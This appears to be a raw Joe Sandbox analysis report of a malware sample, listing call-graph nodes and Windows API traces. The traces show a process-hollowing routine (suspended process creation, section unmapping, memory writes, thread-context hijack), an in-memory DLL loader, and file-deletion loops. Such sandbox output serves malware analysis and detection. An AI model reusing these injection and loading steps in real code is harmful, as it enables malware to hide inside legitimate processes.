435ecd 20 API calls _free 54745->54763 54746->54750 54748 448c33 _strftime 11 API calls 54751 44ae8e 54748->54751 54749->54745 54749->54748 54764 435ecd 20 API calls _free 54750->54764 54751->54745 54752 44ae9d WideCharToMultiByte 54751->54752 54752->54745 54753 44aedd 54752->54753 54765 435ecd 20 API calls _free 54753->54765 54756 44854a _abort 5 API calls 54755->54756 54757 448c5a 54756->54757 54760 448c63 54757->54760 54766 448cbb 10 API calls 3 library calls 54757->54766 54759 448ca3 LCMapStringW 54759->54760 54761 43502b CatchGuardHandler 5 API calls 54760->54761 54762 448cb5 54761->54762 54762->54742 54762->54743 54762->54750 54763->54750 54764->54732 54765->54750 54766->54759 54768 41cc20 LoadLibraryA GetProcAddress 54767->54768 54769 41cc10 GetModuleHandleA GetProcAddress 54767->54769 54770 41cc49 44 API calls 54768->54770 54771 41cc39 LoadLibraryA GetProcAddress 54768->54771 54769->54768 54770->54291 54771->54770 55085 41b539 FindResourceA 54772->55085 54775 43bda0 new 21 API calls 54776 40f428 ctype 54775->54776 54777 4020b7 28 API calls 54776->54777 54778 40f443 54777->54778 54779 401fe2 28 API calls 54778->54779 54780 40f44e 54779->54780 54781 401fd8 11 API calls 54780->54781 54782 40f457 54781->54782 54783 43bda0 new 21 API calls 54782->54783 54784 40f468 ctype 54783->54784 55088 406e13 54784->55088 54786 40f49b 54786->54293 54788 40fb5e 54787->54788 54790 40fb65 54787->54790 55091 402163 11 API calls 54788->55091 54790->54301 55092 401fab 54791->55092 54981->54308 54982->54317 54983->54321 54986 4020df 11 API calls 54985->54986 54987 406c65 54986->54987 54988 4032a0 28 API calls 54987->54988 54989 406c82 54988->54989 54989->54342 54991 40ebdf 54990->54991 54992 4135ae RegQueryValueExA RegCloseKey 54990->54992 54991->54339 54991->54356 54992->54991 54993->54347 55083->54366 55086 41b556 LoadResource LockResource SizeofResource 55085->55086 55087 40f419 55085->55087 55086->55087 55087->54775 55089 4020b7 28 API calls 55088->55089 55090 406e27 55089->55090 55090->54786 55091->54790 55597 4129da 55598 4129ec 55597->55598 55599 4041a2 28 API calls 55598->55599 55600 4129ff 55599->55600 55601 4020f6 28 API calls 55600->55601 55602 412a0e 55601->55602 55603 4020f6 28 API calls 55602->55603 55604 412a1d 55603->55604 55605 41beac 28 API calls 55604->55605 55606 412a26 55605->55606 55607 412ace 55606->55607 55609 401e65 22 API calls 55606->55609 55608 401e8d 11 API calls 55607->55608 55610 412ad7 55608->55610 55611 412a3d 55609->55611 55612 401fd8 11 API calls 55610->55612 55613 4020f6 28 API calls 55611->55613 55614 412ae0 55612->55614 55615 412a48 55613->55615 55616 401fd8 11 API calls 55614->55616 55617 401e65 22 API calls 55615->55617 55618 412ae8 55616->55618 55619 412a53 55617->55619 55620 4020f6 28 API calls 55619->55620 55621 412a5e 55620->55621 55622 401e65 22 API calls 55621->55622 55623 412a69 55622->55623 55624 4020f6 28 API calls 55623->55624 55625 412a74 55624->55625 55626 401e65 22 API calls 55625->55626 55627 412a7f 55626->55627 55628 4020f6 28 API calls 55627->55628 55629 412a8a 55628->55629 55630 401e65 22 API calls 55629->55630 55631 412a95 55630->55631 55632 4020f6 28 API calls 55631->55632 55633 412aa0 55632->55633 55634 401e65 22 API calls 55633->55634 55635 412aae 55634->55635 55636 4020f6 28 API calls 55635->55636 55637 412ab9 55636->55637 55641 412aef GetModuleFileNameW 55637->55641 55640 404e26 99 API calls 55640->55607 55642 4020df 11 API calls 55641->55642 55643 412b1a 55642->55643 55644 4020df 11 API calls 55643->55644 55645 412b26 55644->55645 55646 4020df 11 API calls 55645->55646 55669 412b32 55646->55669 55647 40da23 32 API calls 55647->55669 55648 401fd8 11 API calls 55648->55669 55649 41ba09 43 API calls 55649->55669 55650 4185a3 31 API calls 55650->55669 55651 412c58 Sleep 55651->55669 55652 40417e 28 API calls 55652->55669 55653 4042fc 85 API calls 55653->55669 55654 40431d 28 API calls 55654->55669 55655 401f09 11 API calls 55655->55669 55656 412cfa Sleep 55656->55669 55657 403014 28 API calls 55657->55669 55658 412d9c Sleep 55658->55669 55659 41c516 32 API calls 55659->55669 55660 412dff DeleteFileW 55660->55669 55661 412e36 DeleteFileW 55661->55669 55662 412e61 55664 412e72 DeleteFileW 55662->55664 55662->55669 55677 401f09 11 API calls 55662->55677 55680 412eff 55662->55680 55663 412e88 Sleep 55663->55669 55664->55669 55665 412f01 55666 401f09 11 API calls 55665->55666 55667 412f0d 55666->55667 55668 401f09 11 API calls 55667->55668 55670 412f19 55668->55670 55669->55647 55669->55648 55669->55649 55669->55650 55669->55651 55669->55652 55669->55653 55669->55654 55669->55655 55669->55656 55669->55657 55669->55658 55669->55659 55669->55660 55669->55661 55669->55662 55669->55663 55669->55665 55673 412ecd Sleep 55669->55673 55671 401f09 11 API calls 55670->55671 55672 412f25 55671->55672 55674 40b93f 28 API calls 55672->55674 55675 401f09 11 API calls 55673->55675 55676 412f38 55674->55676 55675->55662 55678 4020f6 28 API calls 55676->55678 55677->55662 55679 412f58 55678->55679 55788 413268 55679->55788 55680->55672 55683 401f09 11 API calls 55684 412f6f 55683->55684 55685 4130e3 55684->55685 55686 412f8f 55684->55686 55687 41bdaf 28 API calls 55685->55687 55688 41bdaf 28 API calls 55686->55688 55689 4130ec 55687->55689 55690 412f9b 55688->55690 55691 402f31 28 API calls 55689->55691 55692 41bc1f 28 API calls 55690->55692 55693 413123 55691->55693 55694 412fb5 55692->55694 55695 402f10 28 API calls 55693->55695 55696 402f31 28 API calls 55694->55696 55697 413132 55695->55697 55698 412fe5 55696->55698 55699 402f10 28 API calls 55697->55699 55700 402f10 28 API calls 55698->55700 55701 41313e 55699->55701 55702 412ff4 55700->55702 55703 402f10 28 API calls 55701->55703 55704 402f10 28 API calls 55702->55704 55705 41314d 55703->55705 55706 413003 55704->55706 55707 402f10 28 API calls 55705->55707 55708 402f10 28 API calls 55706->55708 55710 41315c 55707->55710 55709 413012 55708->55709 55712 402f10 28 API calls 55709->55712 55711 402f10 28 API calls 55710->55711 55713 41316b 55711->55713 55714 413021 55712->55714 55715 402f10 28 API calls 55713->55715 55716 402f10 28 API calls 55714->55716 55717 41317a 55715->55717 55718 41302d 55716->55718 55802 402ea1 28 API calls 55717->55802 55720 402f10 28 API calls 55718->55720 55722 413039 55720->55722 55721 413184 55723 404aa1 62 API calls 55721->55723 55800 402ea1 28 API calls 55722->55800 55725 413191 55723->55725 55727 401fd8 11 API calls 55725->55727 55726 413048 55728 402f10 28 API calls 55726->55728 55729 41319d 55727->55729 55730 413054 55728->55730 55731 401fd8 11 API calls 55729->55731 55801 402ea1 28 API calls 55730->55801 55733 4131a9 55731->55733 55735 401fd8 11 API calls 55733->55735 55734 41305e 55736 404aa1 62 API calls 55734->55736 55737 4131b5 55735->55737 55738 41306b 55736->55738 55739 401fd8 11 API calls 55737->55739 55740 401fd8 11 API calls 55738->55740 55742 4131c1 55739->55742 55741 413074 55740->55741 55744 401fd8 11 API calls 55741->55744 55743 401fd8 11 API calls 55742->55743 55745 4131ca 55743->55745 55746 41307d 55744->55746 55747 401fd8 11 API calls 55745->55747 55748 401fd8 11 API calls 55746->55748 55749 4131d3 55747->55749 55750 413086 55748->55750 55751 401fd8 11 API calls 55749->55751 55752 401fd8 11 API calls 55750->55752 55753 4130d7 55751->55753 55754 41308f 55752->55754 55756 401fd8 11 API calls 55753->55756 55755 401fd8 11 API calls 55754->55755 55757 41309b 55755->55757 55758 4131e5 55756->55758 55759 401fd8 11 API calls 55757->55759 55760 401f09 11 API calls 55758->55760 55761 4130a7 55759->55761 55762 4131f1 55760->55762 55763 401fd8 11 API calls 55761->55763 55764 401fd8 11 API calls 55762->55764 55765 4130b3 55763->55765 55766 4131fd 55764->55766 55767 401fd8 11 API calls 55765->55767 55768 401fd8 11 API calls 55766->55768 55769 4130bf 55767->55769 55770 413209 55768->55770 55771 401fd8 11 API calls 55769->55771 55773 401fd8 11 API calls 55770->55773 55772 4130cb 55771->55772 55775 401fd8 11 API calls 55772->55775 55774 413215 55773->55774 55776 401fd8 11 API calls 55774->55776 55775->55753 55777 413221 55776->55777 55778 401fd8 11 API calls 55777->55778 55779 41322d 55778->55779 55780 401fd8 11 API calls 55779->55780 55781 413239 55780->55781 55782 401fd8 11 API calls 55781->55782 55783 413245 55782->55783 55784 401fd8 11 API calls 55783->55784 55785 413251 55784->55785 55786 401fd8 11 API calls 55785->55786 55787 412abe 55786->55787 55787->55640 55789 4132a6 55788->55789 55791 413277 55788->55791 55790 4132b5 55789->55790 55803 10001c5b 55789->55803 55792 40417e 28 API calls 55790->55792 55807 411d2d 55791->55807 55794 4132c1 55792->55794 55796 401fd8 11 API calls 55794->55796 55798 412f63 55796->55798 55798->55683 55800->55726 55801->55734 55802->55721 55804 10001c6b ___scrt_fastfail 55803->55804 55811 100012ee 55804->55811 55806 10001c87 55806->55790 55853 411d39 55807->55853 55810 411fa2 22 API calls new 55810->55789 55812 10001324 ___scrt_fastfail 55811->55812 55813 100013b7 GetEnvironmentVariableW 55812->55813 55837 100010f1 55813->55837 55816 100010f1 51 API calls 55817 10001465 55816->55817 55818 100010f1 51 API calls 55817->55818 55819 10001479 55818->55819 55820 100010f1 51 API calls 55819->55820 55821 1000148d 55820->55821 55822 100010f1 51 API calls 55821->55822 55823 100014a1 55822->55823 55824 100010f1 51 API calls 55823->55824 55825 100014b5 lstrlenW 55824->55825 55826 100014d9 lstrlenW 55825->55826 55836 100014d2 55825->55836 55827 100010f1 51 API calls 55826->55827 55828 10001501 lstrlenW lstrcatW 55827->55828 55829 100010f1 51 API calls 55828->55829 55830 10001539 lstrlenW lstrcatW 55829->55830 55831 100010f1 51 API calls 55830->55831 55832 1000156b lstrlenW lstrcatW 55831->55832 55833 100010f1 51 API calls 55832->55833 55834 1000159d lstrlenW lstrcatW 55833->55834 55835 100010f1 51 API calls 55834->55835 55835->55836 55836->55806 55838 10001118 ___scrt_fastfail 55837->55838 55839 10001129 lstrlenW 55838->55839 55850 10002c40 55839->55850 55841 10001148 lstrcatW lstrlenW 55842 10001177 lstrlenW FindFirstFileW 55841->55842 55843 10001168 lstrlenW 55841->55843 55844 100011a0 55842->55844 55845 100011e1 55842->55845 55843->55842 55846 100011c7 FindNextFileW 55844->55846 55847 100011aa 55844->55847 55845->55816 55846->55844 55849 100011da FindClose 55846->55849 55847->55846 55852 10001000 51 API calls ___scrt_fastfail 55847->55852 55849->55845 55851 10002c57 55850->55851 55851->55841 55851->55851 55852->55847 55888 4117d7 55853->55888 55855 411d57 55856 411d6d SetLastError 55855->55856 55857 4117d7 SetLastError 55855->55857 55884 411d35 55855->55884 55856->55884 55858 411d8a 55857->55858 55858->55856 55860 411dac GetNativeSystemInfo 55858->55860 55858->55884 55861 411df2 55860->55861 55872 411dff SetLastError 55861->55872 55891 411cde VirtualAlloc 55861->55891 55864 411e22 55865 411e47 GetProcessHeap HeapAlloc 55864->55865 55917 411cde VirtualAlloc 55864->55917 55867 411e70 55865->55867 55868 411e5e 55865->55868 55870 4117d7 SetLastError 55867->55870 55918 411cf5 VirtualFree 55868->55918 55873 411eb9 55870->55873 55871 411e3a 55871->55865 55871->55872 55872->55884 55874 411f6b 55873->55874 55892 411cde VirtualAlloc 55873->55892 55919 4120b2 GetProcessHeap HeapFree 55874->55919 55877 411ed2 ctype 55893 4117ea 55877->55893 55879 411efe 55879->55874 55897 411b9a 55879->55897 55883 411f36 55883->55874 55883->55884 55913 1000220c 55883->55913 55884->55810 55885 411f5c 55885->55884 55886 411f60 SetLastError 55885->55886 55886->55874 55889 4117e6 55888->55889 55890 4117db SetLastError 55888->55890 55889->55855 55890->55855 55891->55864 55892->55877 55894 4118c0 55893->55894 55895 411816 ctype ___scrt_get_show_window_mode 55893->55895 55894->55879 55895->55894 55896 4117d7 SetLastError 55895->55896 55896->55895 55898 411bbb IsBadReadPtr 55897->55898 55905 411ca5 55897->55905 55901 411bd5 55898->55901 55898->55905 55902 411cbd SetLastError 55901->55902 55903 411ca7 SetLastError 55901->55903 55904 411c8a IsBadReadPtr 55901->55904 55901->55905 55920 440f5d 22 API calls 4 library calls 55901->55920 55902->55905 55903->55905 55904->55901 55904->55905 55905->55874 55907 41198a 55905->55907 55911 4119b0 55907->55911 55908 411a99 55909 4118ed VirtualProtect 55908->55909 55910 411aab 55909->55910 55910->55883 55911->55908 55911->55910 55921 4118ed 55911->55921 55914 10002215 55913->55914 55915 1000221a dllmain_dispatch 55913->55915 55925 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55914->55925 55915->55885 55917->55871 55918->55872 55919->55884 55920->55901 55922 4118fe 55921->55922 55924 4118f6 55921->55924 55923 411971 VirtualProtect 55922->55923 55922->55924 55923->55924 55924->55911 55925->55915 55926 40165e 55927 401666 55926->55927 55928 401669 55926->55928 55929 4016a8 55928->55929 55931 401696 55928->55931 55930 43455e new 22 API calls 55929->55930 55932 40169c 55930->55932 55933 43455e new 22 API calls 55931->55933 55933->55932 55934 426cdc 55939 426d59 send 55934->55939 55940 10001f3f 55941 10001f4b ___DestructExceptionObject 55940->55941 55958 1000247c 55941->55958 55943 10001f52 55944 10002041 55943->55944 55945 10001f7c 55943->55945 55951 10001f57 ___scrt_is_nonwritable_in_current_image 55943->55951 55974 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55944->55974 55969 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55945->55969 55948 10002048 55949 10001f8b __RTC_Initialize 55949->55951 55970 100022fc RtlInitializeSListHead 55949->55970 55952 10001f99 ___scrt_initialize_default_local_stdio_options 55971 100046c5 5 API calls _ValidateLocalCookies 55952->55971 55954 10001fad 55954->55951 55972 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55954->55972 55956 10001fb8 55956->55951 55973 10004669 5 API calls _ValidateLocalCookies 55956->55973 55959 10002485 55958->55959 55975 10002933 IsProcessorFeaturePresent 55959->55975 55961 10002491 55976 100034ea 55961->55976 55963 10002496 55964 1000249a 55963->55964 55985 100053c8 55963->55985 55964->55943 55967 100024b1 55967->55943 55969->55949 55970->55952 55971->55954 55972->55956 55973->55951 55974->55948 55975->55961 55977 100034ef ___vcrt_initialize_winapi_thunks 55976->55977 55989 10003936 6 API calls 2 library calls 55977->55989 55979 100034f9 55980 100034fd 55979->55980 55990 100038e8 55979->55990 55980->55963 55982 10003505 55983 10003510 55982->55983 55998 10003972 RtlDeleteCriticalSection 55982->55998 55983->55963 56017 10007457 55985->56017 55988 10003529 7 API calls 3 library calls 55988->55964 55989->55979 55999 10003af1 55990->55999 55994 1000390b 55995 10003918 55994->55995 56005 1000391b 5 API calls ___vcrt_FlsFree 55994->56005 55995->55982 55997 100038fd 55997->55982 55998->55980 56006 10003a82 55999->56006 56001 10003b0b 56002 10003b24 TlsAlloc 56001->56002 56003 100038f2 56001->56003 56003->55997 56004 10003ba2 5 API calls try_get_function 56003->56004 56004->55994 56005->55997 56007 10003aaa 56006->56007 56009 10003aa6 __crt_fast_encode_pointer 56006->56009 56007->56009 56010 100039be 56007->56010 56009->56001 56012 100039cd try_get_first_available_module 56010->56012 56011 100039ea LoadLibraryExW 56011->56012 56013 10003a05 GetLastError 56011->56013 56012->56011 56014 10003a60 FreeLibrary 56012->56014 56015 10003a77 56012->56015 56016 10003a38 LoadLibraryExW 56012->56016 56013->56012 56014->56012 56015->56009 56016->56012 56020 10007470 56017->56020 56018 10002ada _ValidateLocalCookies 5 API calls 56019 100024a3 56018->56019 56019->55967 56019->55988 56020->56018 56021 10005bff 56029 10005d5c 56021->56029 56023 10005c13 56026 10005c1b 56027 10005c28 56026->56027 56037 10005c2b 10 API calls 56026->56037 56030 10005c45 _abort 4 API calls 56029->56030 56031 10005d83 56030->56031 56032 10005d9b TlsAlloc 56031->56032 56033 10005d8c 56031->56033 56032->56033 56034 10002ada _ValidateLocalCookies 5 API calls 56033->56034 56035 10005c09 56034->56035 56035->56023 56036 10005b7a 19 API calls 2 library calls 56035->56036 56036->56026 56037->56023

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                          • API String ID: 4236061018-3687161714
                                                                                                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                          • NtClose.NTDLL(?), ref: 00418332
                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                          • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                          • API String ID: 316982871-3035715614
                                                                                                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
